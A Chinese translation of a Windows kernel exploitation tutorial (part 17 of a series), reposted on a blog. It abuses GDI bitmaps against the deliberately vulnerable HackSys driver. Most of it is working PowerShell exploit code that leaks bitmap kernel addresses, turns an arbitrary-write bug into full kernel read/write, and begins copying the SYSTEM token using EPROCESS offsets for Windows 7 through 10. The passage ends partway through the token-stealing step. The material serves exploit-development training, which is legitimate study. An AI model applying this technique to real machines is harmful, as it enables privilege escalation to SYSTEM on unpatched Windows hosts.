gdi win7奔溃_[翻译]Windows exploit开发系列教程第十七部分:内核利用程序之滥用GDI Bitmap(Win7-10 32/64位)...

最新推荐文章于 2023-06-13 08:10:50 发布
最新推荐文章于 2023-06-13 08:10:50 发布
阅读量213 收藏
点赞数
文章标签: gdi win7奔溃
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29328371/article/details/112897974
版权

点击查看原文。

Windows exploit开发系列教程第十七部分:内核利用程序之滥用GDI Bitmap(Win7-10 32/64位)

欢迎回来!我们将再次通过 @HackSysTeam's 驱动深入到ring0层。本文中我们将重温任意地址任意写漏洞。通过实现一个强大的ring0层读写功能我们可以在32位和64位的Windows 7/8/8.1/10(pre v1607)系统上创造一个可以工作的exploit!如我们即将所见,该技术本质上是一个数据攻击,因此我们将不费力气的绕过SMEP/SMAP/CFG/RFG缓解措施,直达胜利!

本技术有一点“复杂”,需要一些预备知识。这一部分我强烈推荐读者在开始阅读本文之前,先阅读下面的资源。最后,为了尝鲜,我们将在64位的Windows 10系统上开发exp。那就不跟你多BB,让我们开始吧!

HackSysTeam-PSKernelPwn (@FuzzySec) - here

Abusing GDI for ring0 exploit primitives (@CoreSecurity) - here

Abusing GDI Reloaded (@CoreSecurity) - here

This Time Font hunt you down in 4 bytes (@keen_lab) - here

Terminus Project (@rwfpl) - here

侦查挑战

我们将直接对第十一部分的任意地址任意写漏洞重新梳理,也就无需再次做完整的

解读。我们只想确保我们的任意写在Win10上依然可以如期工作。

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

public static class EVD

{

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]

public static extern IntPtr CreateFile(

String lpFileName,

UInt32 dwDesiredAccess,

UInt32 dwShareMode,

IntPtr lpSecurityAttributes,

UInt32 dwCreationDisposition,

UInt32 dwFlagsAndAttributes,

IntPtr hTemplateFile);

[DllImport("Kernel32.dll", SetLastError = true)]

public static extern bool DeviceIoControl(

IntPtr hDevice,

int IoControlCode,

byte[] InBuffer,

int nInBufferSize,

byte[] OutBuffer,

int nOutBufferSize,

ref int pBytesReturned,

IntPtr Overlapped);

}

"@

$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)

if ($hDevice -eq -1) {

echo "`n[!] Unable to get driver handle..`n"

Return

} else {

echo "`n[>] Driver information.."

echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"

echo "[+] Handle: $hDevice"

}

[byte[]]$Buffer = [System.BitConverter]::GetBytes(0x4141414141414141) + [System.BitConverter]::GetBytes(0x4242424242424242)

echo "`n[>] Sending buffer.."

echo "[+] Buffer length: $($Buffer.Length)"

echo "[+] IOCTL: 0x22200B"

[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null

看起来我们得到了想要的结果。

如果你记着第十部分的话就会发现这并不完整。我们写进去的值实际上并不是0x4141414141414141,而是该地址上存储的指针。与此同时,我们的POC仅仅在64位机上成功运行。我们需要对exp的架构独立性进行调整!

我们可以修改buffer结构成下面的内容,以成功在32/64位机实现任意写。

# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere

#---

[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WriteWhat).Length)

[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WriteWhat), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WriteWhat).Length)

if ($x32Architecture) {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($WriteWhere)

} else {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($WriteWhere)

}

尽管传递了合适的值,它也并不能工作。

Pwn

简单的工作完成了。我们现在想要的是将一个单一任意写漏洞转换成一个完全的ring0读写。在高级别下我们可以:

创建两个bitmap对象

泄露出各自的内核地址

使用任意写漏洞修改其中一个bitmap对象的header成员

使用Gdi32的GetBitmapBits/SetBitmapBits API调用来读写内核地址空间

本技术重要的部分在于,当创建一个bitmap时,我们可以泄露出其在内核中的地址。这一泄露在Windows10的v1607版本之后被打上了补丁,哭哭。

如其所呈现般,当创建一个bitmap时,一个结构被附加到了父进程PEB的GdiSharedHandleTable中。给定进程PEB的基地址,GdiSharedHandleTable就在如下的偏移处(分别于32/64位)。

[StructLayout(LayoutKind.Explicit, Size = 256)]

public struct _PEB

{

[FieldOffset(148)]

public IntPtr GdiSharedHandleTable32;

[FieldOffset(248)]

public IntPtr GdiSharedHandleTable64;

}

PEB中的该条目是一个指向GDICELL结构体数组的指针,它定义了多种不同的image类型。该结构体的定义如下:

/// 32bit size: 0x10

/// 64bit size: 0x18

[StructLayout(LayoutKind.Sequential)]

public struct _GDI_CELL

{

public IntPtr pKernelAddress;

public UInt16 wProcessId;

public UInt16 wCount;

public UInt16 wUpper;

public UInt16 wType;

public IntPtr pUserAddress;

}

让我们用下面的POC来看看是否可以在KD中手动找到_GDI_CELL结构体。

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

public static class EVD

{

[DllImport("gdi32.dll")]

public static extern IntPtr CreateBitmap(

int nWidth,

int nHeight,

uint cPlanes,

uint cBitsPerPel,

IntPtr lpvBits);

}

"@

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$Bitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

"{0:X}" -f [int]$Bitmap

运行POC,立即得到了一个bitmap句柄,可以看到它不是一个标准的句柄值(看起来太大了)。

实际上,bitmap句柄的最后两个字节是该结构在GdiSharedHandleTable数组中的索引(=>handle & 0xffff)。于是,让我们跳转到KD来看看是否可以找到我们新创建的bitmap的_GDI_CELL结构。

有了指向GdiSharedHandleTable数组的指针,我们所需要做的就是按结构体尺寸的倍数(64位为0x18)增加结构体的索引。

Process hacker有一个非常有用的特性来列出GDI对象句柄。我们可以用它来证实在KD中找到的值。

很棒!我们需要通过重新来采集两个bitmap的信息(manager+worker)。如我们可以看到的,在bitmap句柄上仅仅是做一些简单的数学运算。唯一的问题在于我们要如何拿到进程PEB的基地址。幸运的是,未文档化的NtQueryInformationProcess函数可以解决这个问题。当使用ProcessBasicInformation类(0x0)来调用该函数时,它会返回一个包含PEB基地址的结构体。在这里,我不会进一步描述更多的细节,毕竟这是个妇孺皆知的技巧。下面的POC会清理掉任何疑点!

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]

public struct _PROCESS_BASIC_INFORMATION

{

public IntPtr ExitStatus;

public IntPtr PebBaseAddress;

public IntPtr AffinityMask;

public IntPtr BasePriority;

public UIntPtr UniqueProcessId;

public IntPtr InheritedFromUniqueProcessId;

}

/// Partial _PEB

[StructLayout(LayoutKind.Explicit, Size = 256)]

public struct _PEB

{

[FieldOffset(148)]

public IntPtr GdiSharedHandleTable32;

[FieldOffset(248)]

public IntPtr GdiSharedHandleTable64;

}

[StructLayout(LayoutKind.Sequential)]

public struct _GDI_CELL

{

public IntPtr pKernelAddress;

public UInt16 wProcessId;

public UInt16 wCount;

public UInt16 wUpper;

public UInt16 wType;

public IntPtr pUserAddress;

}

public static class EVD

{

[DllImport("ntdll.dll")]

public static extern int NtQueryInformationProcess(

IntPtr processHandle,

int processInformationClass,

ref _PROCESS_BASIC_INFORMATION processInformation,

int processInformationLength,

ref int returnLength);

[DllImport("gdi32.dll")]

public static extern IntPtr CreateBitmap(

int nWidth,

int nHeight,

uint cPlanes,

uint cBitsPerPel,

IntPtr lpvBits);

}

"@

#==============================================[PEB]

# Flag architecture $x32Architecture/!$x32Architecture

if ([System.IntPtr]::Size -eq 4) {

echo "`n[>] Target is 32-bit!"

$x32Architecture = 1

} else {

echo "`n[>] Target is 64-bit!"

}

# Current Proc handle

$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle

# Process Basic Information

$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION

$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)

$returnLength = New-Object Int

$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)

# PID & PEB address

echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"

if ($x32Architecture) {

echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"

} else {

echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"

}

# Lazy PEB parsing

$_PEB = New-Object _PEB

$_PEB = $_PEB.GetType()

$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()

$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset

$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)

# GdiSharedHandleTable

if ($x32Architecture) {

echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"

} else {

echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"

}

# _GDI_CELL size

$_GDI_CELL = New-Object _GDI_CELL

$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)

#==============================================[/PEB]

#==============================================[Bitmap]

echo "`n[>] Creating Bitmaps.."

# Manager Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

}

# Worker Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

}

#==============================================[/Bitmap]

注意到我们的脚本是架构独立的!其中的一个疑题解决掉了,但是我们为什么要关心这些bitmap对象呢?

泄露出来的bitmap内核地址在内核空间中指向了下面的GDI baseobject结构。

/// 32bit size: 0x10

/// 64bit size: 0x18

[StructLayout(LayoutKind.Sequential)]

public struct _BASEOBJECT

{

public IntPtr hHmgr;

public UInt32 ulShareCount;

public UInt16 cExclusiveLock;

public UInt16 BaseFlags;

public UIntPtr Tid;

}

我们对此并无多大兴趣,如果你想要了解更多关于baseobject的信息,请参考ReactOS wiki here. 在这一头部之后,有一个特定的结构体,它的类型取决于该对象的类型。对于bitmaps来说,这是个 surface object 结构体。

/// 32bit size: 0x34

/// 64bit size: 0x50

[StructLayout(LayoutKind.Sequential)]

public struct _SURFOBJ

{

public IntPtr dhsurf;

public IntPtr hsurf;

public IntPtr dhpdev;

public IntPtr hdev;

public IntPtr sizlBitmap;

public UIntPtr cjBits;

public IntPtr pvBits;

public IntPtr pvScan0; /// offset => 32bit = 0x20 & 64bit = 0x38

public UInt32 lDelta;

public UInt32 iUniq;

public UInt32 iBitmapFormat;

public UInt16 iType;

public UInt16 fjBitmap;

}

pvScan0成员就是我们想要的!这一成员是一个指针,指向bitmap的首个扫描行。从泄露出来的内核地址我们可以计算出该成员的偏移。

# 32 bit

[IntPtr]pvScan0_32 = $pKernelAddress + 0x30

# 64 bit

[IntPtr]pvScan0_64 = $pKernelAddress + 0x50

说了这么多,还是那个问题,为什么要关心这货?好吧,有这样两个GDI32 API调用,GetBitmapBits 和 SetBitmapBits ,它们直接操纵该成员。GetBitmaps允许我们在pvScan0地址上读任意字节,SetBitmapBits允许我们在pvScan0地址上写任意字节。闻到pwn的味道了吗?

我们可以简要的更新POC来包含manager和worker bitmap的pvScan0偏移。

# 32 bit

# IntPtr at $HandleTableEntry = pKernelAddress

$BitmapScan0_32 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30

# 64 bit

# IntPtr at $HandleTableEntry = pKernelAddress

$BitmapScan0_64 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

从现在开始,在ring0层的工作就很可以很简单的展开了。最基本的,使用我们的任意写来设置manager bitmap的pvScan0地址去指向worker bitmap的pvScan0地址。整合所有的内容,我们写出下面的POC。

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]

public struct _PROCESS_BASIC_INFORMATION

{

public IntPtr ExitStatus;

public IntPtr PebBaseAddress;

public IntPtr AffinityMask;

public IntPtr BasePriority;

public UIntPtr UniqueProcessId;

public IntPtr InheritedFromUniqueProcessId;

}

/// Partial _PEB

[StructLayout(LayoutKind.Explicit, Size = 256)]

public struct _PEB

{

[FieldOffset(148)]

public IntPtr GdiSharedHandleTable32;

[FieldOffset(248)]

public IntPtr GdiSharedHandleTable64;

}

[StructLayout(LayoutKind.Sequential)]

public struct _GDI_CELL

{

public IntPtr pKernelAddress;

public UInt16 wProcessId;

public UInt16 wCount;

public UInt16 wUpper;

public UInt16 wType;

public IntPtr pUserAddress;

}

public static class EVD

{

[DllImport("ntdll.dll")]

public static extern int NtQueryInformationProcess(

IntPtr processHandle,

int processInformationClass,

ref _PROCESS_BASIC_INFORMATION processInformation,

int processInformationLength,

ref int returnLength);

[DllImport("gdi32.dll")]

public static extern IntPtr CreateBitmap(

int nWidth,

int nHeight,

uint cPlanes,

uint cBitsPerPel,

IntPtr lpvBits);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]

public static extern IntPtr CreateFile(

String lpFileName,

UInt32 dwDesiredAccess,

UInt32 dwShareMode,

IntPtr lpSecurityAttributes,

UInt32 dwCreationDisposition,

UInt32 dwFlagsAndAttributes,

IntPtr hTemplateFile);

[DllImport("Kernel32.dll", SetLastError = true)]

public static extern bool DeviceIoControl(

IntPtr hDevice,

int IoControlCode,

byte[] InBuffer,

int nInBufferSize,

byte[] OutBuffer,

int nOutBufferSize,

ref int pBytesReturned,

IntPtr Overlapped);

}

"@

#==============================================[PEB]

# Flag architecture $x32Architecture/!$x32Architecture

if ([System.IntPtr]::Size -eq 4) {

echo "`n[>] Target is 32-bit!"

$x32Architecture = 1

} else {

echo "`n[>] Target is 64-bit!"

}

# Current Proc handle

$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle

# Process Basic Information

$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION

$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)

$returnLength = New-Object Int

$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)

# PID & PEB address

echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"

if ($x32Architecture) {

echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"

} else {

echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"

}

# Lazy PEB parsing

$_PEB = New-Object _PEB

$_PEB = $_PEB.GetType()

$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()

$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset

$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)

# GdiSharedHandleTable

if ($x32Architecture) {

echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"

} else {

echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"

}

# _GDI_CELL size

$_GDI_CELL = New-Object _GDI_CELL

$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)

#==============================================[/PEB]

#==============================================[Bitmap]

echo "`n[>] Creating Bitmaps.."

# Manager Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

$ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30

echo "[+] Manager pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

$ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

echo "[+] Manager pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"

}

# Worker Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

$WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30

echo "[+] Worker pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

$WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

echo "[+] Worker pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"

}

#==============================================[/Bitmap]

#==============================================[GDI ring0 primitive]

$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)

if ($hDevice -eq -1) {

echo "`n[!] Unable to get driver handle..`n"

Return

} else {

echo "`n[>] Driver information.."

echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"

echo "[+] Handle: $hDevice"

}

# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere

#---

[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WorkerpvScan0).Length)

[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WorkerpvScan0), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WorkerpvScan0).Length)

if ($x32Architecture) {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($ManagerpvScan0)

} else {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($ManagerpvScan0)

}

echo "`n[>] Sending buffer.."

echo "[+] Buffer length: $($Buffer.Length)"

echo "[+] IOCTL: 0x22200B"

[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null

#==============================================[/GDI ring0 primitive]

运行新的POC,在KD中看一下pvScan0。

如上图所见,我们正确修改了manager指针,本质上也就达成了可重用的内核任意读写。使用这些bitmap来读写数据的进程可以在下面看到。

# Arbitrary kernel read

(1) GDI32::SetBitmapBits(Address) -> Manager # This updates the workers pvScan0 pointer

(2) GDI32::GetBitmapBits(Byte Count) -> Worker # Reads X bytes from Address

# Arbitrary kernel write

(1) GDI32::SetBitmapBits(Address) -> Manager # This updates the workers pvScan0 pointer

(2) GDI32::SetBitmapBits(Value) -> Worker # Writes X bytes to Address

花些时间来消化一下,我承认这一开始有些令人困惑。为了方便,我创建了下面的助手函数来做透明化的IntPtr大小的读写。

# Arbitrary Kernel read

function Bitmap-Read {

param ($Address)

$CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))

[IntPtr]$Pointer = [EVD]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)

$CallResult = [EVD]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)

if ($x32Architecture){

[System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)

} else {

[System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)

}

$CallResult = [EVD]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)

}

# Arbitrary Kernel write

function Bitmap-Write {

param ($Address, $Value)

$CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))

$CallResult = [EVD]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))

}

在内核中可以任意读写后,我们仍需要找出如何获取SYSTEM。记住我们在64位Windows 10上,这里有着大量的增强版缓解措施诸如SMEP(阻止我们在用户空间运行shellcode)。既然我们已经可以自由的拷贝数据了,看起来在执行体进程块(EPROCESS)上可以做一个数据攻击。EPROCESS结构体包含了进程token,这个token描述了该进程的安全上下文,同时包含了进程账户相关的身份以及权限。当进程或线程尝试去与一个安全对象交互或尝试去执行一个需要特定权限的功能时,OS通过查询这个token来鉴权。

既然进程的token仅仅是一个EPROCESS结构体中的IntPtr尺寸的值。如果我们可以找到SYSTEM进程,拷贝它的token并覆盖PowerShell进程的token,那我们就提权到了SYSTEM。

第一步就是拿到一个指向SYSTEM EPROCESS结构体的指针。实际上,为了避免蓝屏,我们仅可以安全的利用目标PID 4。有一个非常方便的全局变量PsInitialSystemProcess 指向了system EPROCESS(->PID 4)。我们可以在NT内核中通过NtQueryInformation API拿到这一基地址。我写了个脚本Get-LoadedModules,用于完成这项任务。我们做下面的计算来获取这一全局变量。

echo "[>] Leaking SYSTEM _EPROCESS.."

$SystemModuleArray = Get-LoadedModules

$KernelBase = $SystemModuleArray[0].ImageBase

$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]

$KernelHanle = [EVD]::LoadLibrary("$KernelType")

$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")

$SystemEprocess = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}

$CallResult = [EVD]::FreeLibrary($KernelHanle)

echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SystemEprocess)"

该地址理应持有一个指向system EPROCESS结构的指针,让我们手动验证它。

如果我们把这一逻辑增添到exp中,我们就可以利用Bitmap-Read函数来拷贝system token。还有另外一个需要关心的事,EPROCESS结构体是未文档化的,它变化的相当频繁因此我们需要写一个switch语句来控制不同系统(32/64位)上的不同偏移。我推荐你看一看@rwfpl最精彩的 Terminus项目,它不止一次的帮助过我。switch语句应该像下面这样,注意到它包含了到ActiveProcessLinks的偏移,我们即将用到。

# _EPROCESS UniqueProcessId/Token/ActiveProcessLinks offsets based on OS

# WARNING offsets are invalid for Pre-RTM images!

$OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version

$OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"

switch ($OSMajorMinor)

{

'10.0' # Win10 / 2k16

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e8

$TokenOffset = 0x358

$ActiveProcessLinks = 0x2f0

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xf4

$ActiveProcessLinks = 0xb8

}

}

'6.3' # Win8.1 / 2k12R2

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e0

$TokenOffset = 0x348

$ActiveProcessLinks = 0x2e8

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xec

$ActiveProcessLinks = 0xb8

}

}

'6.2' # Win8 / 2k12

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e0

$TokenOffset = 0x348

$ActiveProcessLinks = 0x2e8

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xec

$ActiveProcessLinks = 0xb8

}

}

'6.1' # Win7 / 2k8R2

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x180

$TokenOffset = 0x208

$ActiveProcessLinks = 0x188

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xf8

$ActiveProcessLinks = 0xb8

}

}

}

有了正确的偏移,就可以添加到exp上了。

# Get EPROCESS entry for System process

echo "`n[>] Leaking SYSTEM _EPROCESS.."

$KernelBase = $SystemModuleArray[0].ImageBase

$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]

$KernelHanle = [EVD]::LoadLibrary("$KernelType")

